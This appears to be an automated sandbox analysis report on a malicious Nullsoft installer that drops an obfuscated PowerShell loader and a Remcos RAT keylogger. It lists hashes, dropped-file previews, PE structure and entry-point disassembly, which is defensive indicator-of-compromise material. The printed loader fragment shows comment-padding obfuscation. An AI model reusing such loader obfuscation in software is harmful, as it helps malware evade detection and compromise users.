                                                PURCHASE ORDER_31062248.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                • 172.67.220.6
                                                Arrival Notice.xlsGet hashmaliciousUnknownBrowse
                                                • 172.67.220.6
                                                Pedido-Faturado-39873.msiGet hashmaliciousUnknownBrowse
                                                • 172.67.220.6
                                                tZvjMg3Hw9.exeGet hashmaliciousPureLog Stealer, RedLine, RisePro Stealer, Vidar, zgRATBrowse
                                                • 172.67.220.6
                                                [V2]launcher.exeGet hashmaliciousPureLog Stealer, RedLine, XmrigBrowse
                                                • 172.67.220.6
                                                confirmation de cuenta.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                • 172.67.220.6
                                                Udskriftsskemaernes.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                • 172.67.220.6
                                                No context
                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                File Type:JSON data
                                                Category:dropped
                                                Size (bytes):965
                                                Entropy (8bit):5.02359004946268
                                                Encrypted:false
                                                SSDEEP:12:tkhXkmnd6UGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkwV:qhXldVauKyGX85jvXhNlT3/7AcV9Wro
                                                MD5:A82488501536043ACF922C4D91246D09
                                                SHA1:BCA9EF44B47567D62A94F2ED6A79491575544D06
                                                SHA-256:47F1D58A3F31240D1EAE84F8585B4AFFA9ECE1EDF5FFB39631431954E1B39D5E
                                                SHA-512:30F80522E14B7AC59FB4D260D8C36A3FB88CCF29B7E279F34A493F94B59CF1EC0951205E33A1E81631AD8C682CF8831BC185E224A43A87BB52CB0C0D7080DB50
                                                Malicious:false
                                                Reputation:low
                                                Preview:{. "geoplugin_request":"191.96.150.225",. "geoplugin_status":200,. "geoplugin_delay":"2ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7123",. "geoplugin_longitude":"-74.0068",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:data
                                                Category:modified
                                                Size (bytes):8003
                                                Entropy (8bit):4.838950934453595
                                                Encrypted:false
                                                SSDEEP:192:Dxoe5nVsm5emdiVFn3eGOVpN6K3bkkjo5agkjDt4iWN3yBGHB9smMdcU6CDpOeik:N+VoGIpN6KQkj2xkjh4iUxeLib4J
                                                MD5:4C24412D4F060F4632C0BD68CC9ECB54
                                                SHA1:3856F6E5CCFF8080EC0DBAC6C25DD8A5E18205DF
                                                SHA-256:411F07FE2630E87835E434D00DC55E581BA38ECA0C2025913FB80066B2FFF2CE
                                                SHA-512:6538B1A33BF4234E20D156A87C1D5A4D281EFD9A5670A97D61E3A4D0697D5FFE37493B490C2E68F0D9A1FD0A615D0B2729D170008B3C15FA1DD6CAADDE985A1C
                                                Malicious:false
                                                Reputation:moderate, very likely benign file
                                                Preview:PSMODULECACHE.....$7o..z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$7o..z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                Category:dropped
                                                Size (bytes):802713
                                                Entropy (8bit):5.909702818787878
                                                Encrypted:false
                                                SSDEEP:12288:DrC48OWaxjjtjj9bHGMIvxV7G5iMOQrLTI9AVZ/RZF:H7/jxjjtjj9JIvxV7G5iMN/0GZ/RZF
                                                MD5:6775321BBBE02737DAFF72CBFEF1D3A5
                                                SHA1:778FB1443B71B7AFBF8965D6FAD12247C7E2BEFC
                                                SHA-256:0D8B7479BD9156032CF3287FAEE1807E96D68C7BCE3835C7E3435951446BADE1
                                                SHA-512:0970F311B772C014384A17D0C3B51A47F7046096D2D140DB7FBE665087369FDE3123C77283304121AC37517A3AA117787C42914884EC82F985DDF88C7531B810
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 32%
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1)..PG..PG..PG.*_...PG..PF.IPG.*_...PG.sw..PG..VA..PG.Rich.PG.........PE..L...p..V.................^...........0.......p....@.......................................@..................................s.......@..XB...........................................................................p...............................text...[\.......^.................. ..`.rdata.......p.......b..............@..@.data................v..............@....ndata.......@...........................rsrc...XB...@...D...z..............@..@................................................................................................................................................................................................................................................................................................................................................................
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):26
                                                Entropy (8bit):3.95006375643621
                                                Encrypted:false
                                                SSDEEP:3:ggPYV:rPYV
                                                MD5:187F488E27DB4AF347237FE461A079AD
                                                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                Malicious:false
                                                Preview:[ZoneTransfer]....ZoneId=0
                                                Process:C:\Users\user\Desktop\Evgh. rvs Armenia. 30.04.2024.exe
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):541
                                                Entropy (8bit):4.233078036185589
                                                Encrypted:false
                                                SSDEEP:12:207ugGwsLDnF87kTJiB4V7SDjLWFk9LYO1JV87H68dGx+pSLWl:20igGJDnOATHSGkL71w7a8dJ
                                                MD5:87DA0589AA2102C1224D596AA149E56B
                                                SHA1:1E1CCE9146840B718221D8D69CB511A57AF9CCD9
                                                SHA-256:A4C9E26743D76D4B7D7C357DFABA14BC0EF918CE05BBC8472C1FE6E2CCB2392C
                                                SHA-512:04878E203A6D30CC6087A5781A4C8CB781B023938883BB7BF312FD504B70C9BF8256463112998D679C8A9686AF5C8D83DB840CB4913155D250A477DD7F8B2DE8
                                                Malicious:false
                                                Preview:scrams cocainist schizognathous montage nedskrivningstidspunkter drunks sceneteknikers charm diffuses dragonish lserettighederne..lyknsker konkluder cyclicality spaanskraberen kartoteksstyring antilabour sortebrdres,foraarssemestret inbond raaskitsen housewives alterable.foreskrive inspissation predine barderendes hootingly unpunishing unleading revolts unpennied idriftsttende fllesanlgget tailorizes..yverformer stroppens corallita dissensions.disenfranchisements skaalfrugterne cartooning unyttigere transfigurationen hairnet textronix.
                                                Process:C:\Users\user\Desktop\Evgh. rvs Armenia. 30.04.2024.exe
                                                File Type:ASCII text, with very long lines (60984), with no line terminators
                                                Category:dropped
                                                Size (bytes):60984
                                                Entropy (8bit):5.3491381648349305
                                                Encrypted:false
                                                SSDEEP:1536:YZzbiRU2WUoHhEBe6aOe0P2vG2Ib4OO5S3oaT:gzbUUnU2hmVaM2vR7NS3d
                                                MD5:7A00C4088C123D61422F4FE0DB41BD24
                                                SHA1:8DCB56788E82418C69556771808BB6C7B977067F
                                                SHA-256:B7D771D62B14D618608D7541302035B824E69CEE7A497AB326A14E7562800F3A
                                                SHA-512:E5C309D5D1CEC2083750E242D901F8BDC3A845018603F6ED16436F65EBDA2E1E7F5978AC3DC838199CAE22AB7B0C12C930CF941BB25C33886731D76C5598AE37
                                                Malicious:true
                                                Preview:$Matrosen=$Jigger;<#Quaternaries Woolies Opkaldene Alticamelus Flyvegigtens Enchodontid Depreciated #><#Snoreassistenter Triantelope Fejlsynenes Premoisten #><#Unhumidified Sympatheticotonic Fordaervet #><#Troldens Pouched Starterens #><#Skabmiderne Inermi Unpassively #><#Luftigt Blvret Strophomenoid mjavede Yammerers Rigsrevisions Blomstringer #><#Bismerpund Coroutines Obducents Materialismo galoppptr #><#Depravationerne Snedkket Underbelysningernes Grundtrk Bocaccios deedless Nodernes #><#Burdensomeness Teabowls Klippeskrnternes Begrnsedes Untruthfully Eksponeringernes Kuende #><#Unfamiliarised Daakalven Palisade Hepatorrhexis #><#Filetknivenes Noncollectable Shrubberies Uncream Misinformerer #><#Muntres Lamslaa Rnnebrtrets #><#Bunnell Recombination Spul Krogenes Sysselsattes Infula #><#Repset Varmeslangebekendtgrelser Boligministermdes Cultrirostres #><#Unrecoverably Afsnitsnummeret Linjeringens Bulgier #><#Daanefrdiges Emhpasizing Polacca dichastic Svovlindhold #><#Entrepeneur Skri
                                                Process:C:\Users\user\Desktop\Evgh. rvs Armenia. 30.04.2024.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):1114
                                                Entropy (8bit):4.655605033691921
                                                Encrypted:false
                                                SSDEEP:24:73BS5bK10ahqTE7TippZO9ZS2k/23adYJi5r9AODujg3:dcKpqTE3iXZMS2k/2eYs5rSO66
                                                MD5:0B5446B68158AB6494017BDFC85DB330
                                                SHA1:D5612E7254F06481257959C7F70FC0625C59F434
                                                SHA-256:3072A2428CE58559FEB3541DD0E2AD2E3C54E05CF802C9A9A149A2386737B004
                                                SHA-512:636A24CA3652A52F14C62D322C9BE0452C5F82397CC7D1F37B7A541AE80B2529A81472E28E10919A202F8CCC555F26C55B42F97AA281375265E90F0DDE045497
                                                Malicious:false
                                                Preview:........<...A2......c.......2.......k!.........;F.....R..............6.K......s.d.B@......m.o....t............e...v................a......{,....;..B.............E../..........Z...S...'.-...q....k....6.1Q........s.......R.....&.1..U7t.....!...`..)..................:...Je./..f...................q........\!.7....C..s....f....A............S............d..d...(.....u...!.e........S@A.....i......i.r..e.f..i....-..N|.9.%*......AC.......?...w..........B..........(...0......|.....x.................c....\.y......."k...................2......g....?.......S.|.......:..+....r.J.........LA.l.....w....f.............~..u..t...[{..S.1.Y.~..Q..........>......T..{.B..~...t.....3. .\.}......c...u.'..[..W..?.[.I....u.........!H..".... q.......n...<...F.aT2........a...........K.f`...^....Z........?|6?.........k........J....o..6kk..m...........Z.......^..j.....x........g.....#......M........P...........E.....q^8...dL.......tfz.e.6Fn@o.............'...........b.z...Y....(.... ................. .:..t...
                                                Process:C:\Users\user\Desktop\Evgh. rvs Armenia. 30.04.2024.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):296541
                                                Entropy (8bit):7.760851529196259
                                                Encrypted:false
                                                SSDEEP:6144:d+VnvDv+carHKpS+bdwr2LDxZZOhmBS1/8MLluKE2a4Op3VEJMB:dgbBaHKpSOdwr2LD4hmBC8uMXFVEJI
                                                MD5:961A103DACF6F59CFF06D81648A2F791
                                                SHA1:DC779EE2A3129DB451895E52F413592764C03E17
                                                SHA-256:5BE338ACCFC2DF976A1BD39007957E5D5240336FBC7542D3E89CF3B17B0EE028
                                                SHA-512:3C0A75B3BB598C0883FB43A39BD94AA34F5A3C44B2C849A7CEA3D2FF33F48CB48E58D64285568BBB522D1584BD49AF48E77E712B0E74F03182331E23580E25FE
                                                Malicious:false
                                                Preview:......~....{{.y..............=......)))............\...rrr......U....yyyy.............G.......r.......bb....................QQQ..5..........GG......+............m.........::........}}}}....SS..JJJ.......tttt.......@.................................................r.....p..&............hhh....................}...............;....`........................LL..........................--.........................~.....u......//...............\.......................YY.D..............P.......II...............g.......................;.|.....&&.........;....,......................................e....%%%%%..WW......n.................sss.......2..................22222.........}}}.........qqqqq..............G........ZZZZ.nn..YY.....TT.......S...Q.ww.j...V...jjj..................VV..............++++.y........77........Y.........................^..................////.........VVVV...........&....................n.....}}}.O........\\\\...........=.e.........55555.............55..........222.........
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                File Type:Extensible storage engine DataBase, version 0x620, checksum 0xb20b6b62, page size 32768, DirtyShutdown, Windows version 10.0
                                                Category:dropped
                                                Size (bytes):15728640
                                                Entropy (8bit):0.10106922760070924
                                                Encrypted:false
                                                SSDEEP:1536:WSB2jpSB2jFSjlK/yw/ZweshzbOlqVqLesThEjv7veszO/Zk0P1EX:Wa6akUueqaeP6W
                                                MD5:8474A17101F6B908E85D4EF5495DEF3C
                                                SHA1:7B9993C39B3879C85BF4F343E907B9EBBDB8D30F
                                                SHA-256:56CC6547BDF75FA8CA4AF11433A7CAE673C8D1DF0DE51DBEEB19EF3B1D844A2A
                                                SHA-512:056D7FBFB21BFE87642D57275DD07DFD0DAE21D53A7CA7D748D4E89F199B3C212B4D6F5C4923BE156528556516AA8B4D44C6FC4D5287268C6AD5657FE5FEC7A0
                                                Malicious:false
                                                Preview:..kb... ...................':...{........................R.....)....{.......{3.h.T.........................-.1.':...{..........................................................................................................eJ......n........................................................................................................... .......':...{..............................................................................................................................................................................................,....{...........................................{3....................k.....{3..........................#......h.T.....................................................................................................................................................................................................................................................................................................................................................
                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                Category:dropped
                                                Size (bytes):2
                                                Entropy (8bit):1.0
                                                Encrypted:false
                                                SSDEEP:3:Qn:Qn
                                                MD5:F3B25701FE362EC84616A93A45CE9998
                                                SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                Malicious:false
                                                Preview:..
                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):216
                                                Entropy (8bit):3.3501123442286063
                                                Encrypted:false
                                                SSDEEP:3:rhlKlFl1VlDfswl55JWRal2Jl+7R0DAlBG45klovDl6ALilXIkqoojklovDl6v:6llb5YcIeeDAlOWAAe5q1gWAv
                                                MD5:3521982C7E80F1310C71228BC49A7658
                                                SHA1:8B6F3B1D071D8CC95EBD4E7298FC315CD38C9408
                                                SHA-256:B8F230FCF9C72B654A65F4D7B7FB708291D927978208A5AF35512812301BC14B
                                                SHA-512:73533FB35E920D632092101DD68CF3E49900CB0F6411654461B3B92D226469A7AEE19BD32A21121BF71F921D028EE6339B97BE4F47B139CBCCDD73F6DB4A710B
                                                Malicious:true
                                                Yara Hits:
                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\Users\user\AppData\Roaming\mqerms.dat, Author: Joe Security
                                                Preview:....[.2.0.2.4./.0.5./.0.2. .0.8.:.0.4.:.2.9. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....[.W.i.n.].r.....[.R.u.n.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....
                                                Process:C:\Users\user\Desktop\Evgh. rvs Armenia. 30.04.2024.exe
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):36
                                                Entropy (8bit):4.027719015921097
                                                Encrypted:false
                                                SSDEEP:3:VCHZRcY/dv:VCHZRcKt
                                                MD5:40ED5B8117EADCDE3752EC625327924B
                                                SHA1:68E109BDC088F9A20C4081661EB47618DF0838B2
                                                SHA-256:E6862EE9E8FA0B8FCC82CC21C62F46D8A7A80BB4CCF039E1119B5E322C17DE5A
                                                SHA-512:AD29FA5DC4BAD695B914356C83779B69C28167E8F7156564BB6C8FD5D4709E0BD6CE2D85F914F4BE7B81BF64E584D53033B82748039840047FA2800EB9AE9673
                                                Malicious:false
                                                Preview:[fagbogens]..tmesis=unguidableness..
                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                Entropy (8bit):5.909702818787878
                                                TrID:
                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                • DOS Executable Generic (2002/1) 0.02%
                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                File name:Evgh. rvs Armenia. 30.04.2024.exe
                                                File size:802'713 bytes
                                                MD5:6775321bbbe02737daff72cbfef1d3a5
                                                SHA1:778fb1443b71b7afbf8965d6fad12247c7e2befc
                                                SHA256:0d8b7479bd9156032cf3287faee1807e96d68c7bce3835c7e3435951446bade1
                                                SHA512:0970f311b772c014384a17d0c3b51a47f7046096d2d140db7fbe665087369fde3123c77283304121ac37517a3aa117787c42914884ec82f985ddf88c7531b810
                                                SSDEEP:12288:DrC48OWaxjjtjj9bHGMIvxV7G5iMOQrLTI9AVZ/RZF:H7/jxjjtjj9JIvxV7G5iMN/0GZ/RZF
                                                TLSH:6405DF67F84488E4EC2E4D738A5FD5B457257D130E48A74B34E8BB0EAFB66032817D86
                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1)..PG..PG..PG.*_...PG..PF.IPG.*_...PG..sw..PG..VA..PG.Rich.PG.........PE..L...p..V.................^...........0.......p....@
                                                Icon Hash:020035645d190103
                                                Entrypoint:0x4030d9
                                                Entrypoint Section:.text
                                                Digitally signed:false
                                                Imagebase:0x400000
                                                Subsystem:windows gui
                                                Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                Time Stamp:0x567F8470 [Sun Dec 27 06:25:52 2015 UTC]
                                                TLS Callbacks:
                                                CLR (.Net) Version:
                                                OS Version Major:4
                                                OS Version Minor:0
                                                File Version Major:4
                                                File Version Minor:0
                                                Subsystem Version Major:4
                                                Subsystem Version Minor:0
                                                Import Hash:076b06e6a65c9b7cca5a61be0cd82165
                                                Instruction
                                                sub esp, 00000184h
                                                push ebx
                                                push esi
                                                push edi
                                                xor ebx, ebx
                                                push 00008001h
                                                mov dword ptr [esp+18h], ebx
                                                mov dword ptr [esp+10h], 004091B0h
                                                mov dword ptr [esp+20h], ebx
                                                mov byte ptr [esp+14h], 00000020h
                                                call dword ptr [004070A4h]
                                                call dword ptr [004070A0h]
                                                cmp ax, 00000006h
                                                je 00007FC52CB02A93h
                                                push ebx
                                                call 00007FC52CB05A01h
                                                cmp eax, ebx
                                                je 00007FC52CB02A89h
                                                push 00000C00h
                                                call eax
                                                push ebp
                                                push 004091A8h
                                                call 00007FC52CB05981h
                                                push 004091A0h
                                                call 00007FC52CB05977h
                                                push 00409194h
                                                call 00007FC52CB0596Dh
                                                push 00000009h
                                                call 00007FC52CB059D0h
                                                push 00000007h
                                                call 00007FC52CB059C9h
                                                mov dword ptr [00423724h], eax
                                                call dword ptr [0040703Ch]
                                                push ebx
                                                call dword ptr [0040728Ch]
                                                mov dword ptr [004237D8h], eax
                                                push ebx
                                                lea eax, dword ptr [esp+38h]
                                                push 00000160h
                                                push eax
                                                push ebx
                                                push 0041ECE0h
                                                call dword ptr [00407178h]
                                                push 00409188h
                                                push 00422F20h
                                                call 00007FC52CB055F7h
                                                call dword ptr [0040709Ch]
                                                mov ebp, 00429000h
                                                push eax
                                                push ebp
                                                call 00007FC52CB055E5h
                                                push ebx
                                                call dword ptr [00000058h]
                                                Programming Language:
                                                • [EXP] VC++ 6.0 SP5 build 8804
                                                NameVirtual AddressVirtual Size Is in Section
                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x73e00xa0.rdata
                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x340000x74258.rsrc
                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_IAT0x70000x29c.rdata
                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                .text0x10000x5c5b0x5e0025f20353ff4dab35a62d1661fd51d448False0.6599900265957447data6.415883806471021IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                .rdata0x70000x12120x1400a99dc6e1e9123b9d8eb17a3b16908620False0.4169921875data4.933902523070607IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                .data0x90000x1a8180x400c329e2dbf8e92aedf63262846de2292bFalse0.6552734375data5.219575463223351IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                .ndata0x240000x100000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                .rsrc0x340000x742580x74400202599d69fcb7c01c5477f096da78c2aFalse0.2838079637096774data3.8544748251180585IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                RT_ICON0x345980x42028Device independent bitmap graphic, 256 x 512 x 32, image size 270336EnglishUnited States0.23073793531970294
                                                RT_ICON0x765c00x10828Device independent bitmap graphic, 128 x 256 x 32, image size 67584EnglishUnited States0.29760144327457705
                                                RT_ICON0x86de80x94a8Device independent bitmap graphic, 96 x 192 x 32, image size 38016EnglishUnited States0.35447761194029853
                                                RT_ICON0x902900x67e8Device independent bitmap graphic, 80 x 160 x 32, image size 26560EnglishUnited States0.3587593984962406
                                                RT_ICON0x96a780x5488Device independent bitmap graphic, 72 x 144 x 32, image size 21600EnglishUnited States0.37975970425138633
                                                RT_ICON0x9bf000x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896EnglishUnited States0.3780703826169107
                                                RT_ICON0xa01280x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.4371369294605809
                                                RT_ICON0xa26d00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.4866322701688555
                                                RT_ICON0xa37780xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishUnited States0.5205223880597015
                                                RT_ICON0xa46200x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States0.5594262295081968
                                                RT_ICON0xa4fa80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishUnited States0.6768953068592057
                                                RT_ICON0xa58500x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsEnglishUnited States0.5950460829493087
                                                RT_ICON0xa5f180x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152EnglishUnited States0.35
                                                RT_ICON0xa65800x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishUnited States0.40895953757225434
                                                RT_ICON0xa6ae80x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.6471631205673759
                                                RT_ICON0xa6f500x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishUnited States0.4650537634408602
                                                RT_ICON0xa72380x1e8Device independent bitmap graphic, 24 x 48 x 4, image size 288EnglishUnited States0.5184426229508197
                                                RT_ICON0xa74200x130Device independent bitmap graphic, 32 x 64 x 1, image size 128EnglishUnited States0.6644736842105263
                                                RT_ICON0xa75500x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishUnited States0.5675675675675675
                                                RT_ICON0xa76780xb0Device independent bitmap graphic, 16 x 32 x 1, image size 64EnglishUnited States0.6420454545454546
                                                RT_DIALOG0xa77280x100dataEnglishUnited States0.5234375
                                                RT_DIALOG0xa78280x11cdataEnglishUnited States0.6056338028169014
                                                RT_DIALOG0xa79480xc4dataEnglishUnited States0.5918367346938775
                                                RT_DIALOG0xa7a100x60dataEnglishUnited States0.7291666666666666
                                                RT_GROUP_ICON0xa7a700x11edataEnglishUnited States0.5804195804195804
                                                RT_VERSION0xa7b900x29cdataEnglishUnited States0.48353293413173654
                                                RT_MANIFEST0xa7e300x424XML 1.0 document, ASCII text, with very long lines (1060), with no line terminatorsEnglishUnited States0.5132075471698113
                                                DLLImport
                                                KERNEL32.dllSleep, SetFileAttributesA, GetFileAttributesA, GetTickCount, GetModuleFileNameA, GetCurrentProcess, CopyFileA, GetFileSize, ExitProcess, GetWindowsDirectoryA, GetTempPathA, GetCommandLineA, GetVersion, SetErrorMode, lstrlenA, lstrcpynA, ExpandEnvironmentStringsA, SetEnvironmentVariableA, GetFullPathNameA, CreateThread, GetLastError, CreateDirectoryA, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, ReadFile, WriteFile, lstrcpyA, MoveFileExA, lstrcatA, GetSystemDirectoryA, LoadLibraryA, GetProcAddress, lstrcmpiA, lstrcmpA, SetCurrentDirectoryA, MoveFileA, CompareFileTime, GetShortPathNameA, SearchPathA, CloseHandle, SetFileTime, GlobalLock, GetDiskFreeSpaceA, GlobalUnlock, GlobalFree, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, GetPrivateProfileStringA, FindClose, MultiByteToWideChar, MulDiv, WritePrivateProfileStringA, FreeLibrary, LoadLibraryExA, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, GlobalAlloc
